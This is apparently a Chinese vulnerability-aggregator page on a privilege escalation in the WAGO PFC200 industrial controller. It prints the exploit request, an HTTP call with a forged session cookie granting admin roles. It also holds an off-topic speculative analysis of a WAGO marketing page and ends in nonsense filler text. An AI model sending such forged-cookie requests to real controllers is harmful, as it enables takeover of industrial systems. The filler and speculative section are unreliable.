# WAGO PFC200 2ETH RS 权限提升漏洞
N/A
是否为 Web 类漏洞: 未知
判断理由:
| # | POC 描述 | 源链接 | 神龙链接 |
|---|
标题: WAGO 750-8212 PFC200 G2 2ETH RS - Privilege Escalation - Hardware remote Exploit -- 🔗来源链接
标签:exploit
神龙速读:
- **Exploit Title**: WAGO 750-8212 PFC200 G2 2ETH RS - Privilege Escalation
- **EDB-ID**: 50793
- **CVE**: N/A
- **Author**: MOMEN ELDAAWAHLY
- **Type**: REMOTE
- **Platform**: HARDWARE
- **Date**: 2022-02-28
- **Firmware Version**: 03.05.10(17)
- **Tested on**: PopOS! [Linux](Firefox)
- **Vulnerable Request**:
```plaintext
GET /wbm/ HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://192.168.1.1/wbm/
Cookie: NG_WBM_SESSION=qru3ocrpde79m5f73526i65uv5; user={%22name%22:%22admin%22%22roles%22:[%22admin%22%22admin%22]%22hasDefaultPassword%22:true%2C%22csrf%22:%22U2fJfixrfwtLEbVFL6b71ouu1yk1WqKTsdFo52yavqrTF86f%22%2C%22}
```
- **Advisory/Source**: Link
标题: WAGO NL | Uw partner voor automatisering en verbindingstechniek -- 🔗来源链接
标签:product
神龙速读:
从给出的WAGO的网页截图中,我们可以观察到这其实是一个企业宣传和产品介绍页面,并没有直接展示任何关于漏洞的信息。然而,如果我们要从网络安全和信息保护的角度分析,可以推测和建议以下与潜在安全漏洞相关的信息和注意事项:
- **外部链接的安全性**:页面上有指向外部网站的链接,如UReason公司的网站链接(ureason.com/wago.com)。需要确保这些链接指向安全、信誉良好的网站,以防止钓鱼攻击或恶意软件传播。
- **表单和数据收集的安全性**:页面上有收集用户信息的表单,如联系信息和新闻通讯订阅。应确保这些表单采用安全的HTTPS协议传输数据,并遵循GDPR等数据保护法规,保护用户隐私。
- **软件和固件的更新**:在“Downloads”部分,可能提供软件和固件的下载。应定期更新以修补可能存在的安全漏洞,并鼓励用户及时安装更新。
- **社交媒体链接**:页面底部列出了WAGO在各大社交媒体平台的链接。需注意这些链接的安全性,防止不法分子利用社交媒体进行网络攻击。
- **内部网络安全管理**:作为一家涉及工业自动化和电子技术的公司,WAGO应具备严格的内部网络安全管理措施,保护公司机密信息和客户数据安全。
不过,以上分析是基于一般网络安全知识的推测。要获取此页面特定的漏洞信息,需要进行专业的网络安全测试和审计。
标题: WAGO 750-8212 PFC200 G2 2ETH RS Privilege Escalation | Advisories | VulnCheck -- 🔗来源链接
标签:third-party-advisory
神龙速读:
```md
### 关键漏洞信息
#### 漏洞名称
WAGO 750-8212 PFC200 G2 2ETH RS Privilege Escalation
#### 严重性
HIGH
#### 发布日期
January 13, 2026
#### 影响范围
- WAGO 750-8212 PFC200 Firmware version 03.05.10(17)
#### 漏洞类型
CVE-2022-50926
#### 漏洞描述
WAGO 750-8212 PFC200 G2 2ETH RS firmware contains a privilege escalation vulnerability that allows attackers to manipulate user session cookies. Attackers can modify the cookie's 'name' and 'roles' parameters to elevate from ordinary user to administrative privileges without authentication.
#### CVSS评分
7.5/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
#### 漏洞细节
- [ExploitDB-50793](https://www.exploit-db.com/exploits/50793)
- [Official Vendor Homepage](#)
#### 举报者
Momen Eldawakhly (Cyber Guy) at Cypro AB
```
Zaproxy alias impedit expedita quisquam pariatur exercitationem. Nemo rerum eveniet dolores rem quia dignissimos.